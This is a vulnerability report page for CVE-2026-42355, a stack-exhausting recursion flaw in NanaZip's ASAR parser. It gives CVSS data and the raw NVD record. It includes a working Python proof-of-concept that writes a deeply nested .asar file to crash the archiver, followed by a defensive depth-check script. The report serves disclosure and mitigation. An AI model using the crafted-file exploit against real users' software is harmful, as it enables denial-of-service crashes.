Security Vulnerability Report
CVE-2026-42355 CVSS 3.3 LOW

CVE-2026-42355

Published: 2026-05-12 20:16:41
Last Modified: 2026-05-13 16:26:30

Description

NanaZip is an open source file archiver. In versions from 5.0.1252.0 to before 6.0.1698.0, an uncontrolled recursion vulnerability exists in the Electron Archive (ASAR) parser. When a crafted .asar file with deeply nested JSON in the header is opened, both nlohmann::json::parse and the handler's GetAllPaths function recurse without depth limits, exhausting the thread stack and crashing the NanaZip process. The vulnerability is fixed in 6.0.1698.0.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

NanaZip 5.0.1252.0 to before 6.0.1698.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json
import struct
import os

# Create a deeply nested JSON structure to trigger stack overflow
deep_json = {}
current = deep_json

# Set recursion depth (e.g., 10000) to exceed stack limit
recursion_depth = 10000
for _ in range(recursion_depth):
    current["next"] = {}
    current = current["next"]
current["payload"] = "crash"

# Convert to JSON string
json_str = json.dumps(deep_json, separators=(',', ':'))

# ASAR file format: 4-byte size (little endian) + JSON + file content
header_size = len(json_str)
header = struct.pack("<I", header_size) + json_str.encode('utf-8')

# Write the crafted ASAR file
filename = "exploit.asar"
with open(filename, "wb") as f:
    f.write(header)
    # Append dummy content
    f.write(b"MALICIOUS_CONTENT")

print(f"[+] Crafted ASAR file saved as {filename}")
print(f"[+] JSON nesting depth: {recursion_depth}")
print("[+] Open this file with a vulnerable version of NanaZip to trigger the crash.")
```
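For triage and for the mitigation side of the description above, the following is an added example (not NanaZip's code, not its fix, and not part of the original report) that measures header nesting depth with a flat byte scan, so the check itself cannot exhaust the stack. It assumes the simplified header layout used in the PoC above (4-byte little-endian length, then JSON); `MAX_DEPTH`, the function names and both sample inputs are constructed for illustration.

```python
import struct

MAX_DEPTH = 64  # assumed policy limit for this example, not a NanaZip constant

def header_json(blob: bytes) -> bytes:
    """Slice the JSON header; layout as in the PoC: uint32 LE length, then JSON."""
    if len(blob) < 4:
        raise ValueError("truncated: no length prefix")
    (size,) = struct.unpack_from("<I", blob, 0)
    if size > len(blob) - 4:
        raise ValueError("length prefix exceeds file size")
    return blob[4:4 + size]

def max_nesting(js: bytes, limit: int = MAX_DEPTH) -> int:
    """Peak {}/[] depth found by a flat byte scan (no recursion); stops at limit + 1."""
    depth = peak = 0
    in_string = escaped = False
    for b in js:
        if in_string:                 # brackets inside strings do not nest
            if escaped:
                escaped = False
            elif b == 0x5C:           # backslash escapes the next byte
                escaped = True
            elif b == 0x22:           # closing quote
                in_string = False
        elif b == 0x22:
            in_string = True
        elif b in (0x7B, 0x5B):       # { or [
            depth += 1
            peak = max(peak, depth)
            if peak > limit:          # early exit: no need to read the rest
                return peak
        elif b in (0x7D, 0x5D):       # } or ]
            depth = max(depth - 1, 0)
    return peak

def is_suspicious(blob: bytes, limit: int = MAX_DEPTH) -> bool:
    return max_nesting(header_json(blob), limit) > limit

def build(js: str) -> bytes:          # constructed sample input helper
    raw = js.encode()
    return struct.pack("<I", len(raw)) + raw

BENIGN = build('{"files":{"app":{"files":{"main.js":{"size":12,"offset":"0"}}}}}')
NESTED = build('{"files":' * 3000 + "{}" + "}" * 3000)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("nested", NESTED)):
        print(name, "suspicious" if is_suspicious(blob) else "ok")
```

The same bounded, non-recursive walk is the general remedy for CWE-674: reject or cap depth before handing the header to a recursive parser or path walker.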

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42355", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:41.260", "lastModified": "2026-05-13T16:26:29.697", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanaZip is an open source file archive. From 5.0.1252.0 to before 6.0.1698.0, an uncontrolled recursion vulnerability exists in the Electron Archive (ASAR) parser in NanaZip. When opening a crafted .asar file with deeply nested JSON in the header, both nlohmann::json::parse and the handler's GetAllPaths function recurse without depth limits, exhausting the thread stack and crashing the NanaZip process. This vulnerability is fixed in 6.0.1698.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-674"}]}], "references": [{"url": "https://github.com/M2Team/NanaZip/security/advisories/GHSA-4gxf-p4q6-gfrf", "source": "[email protected]"}]}}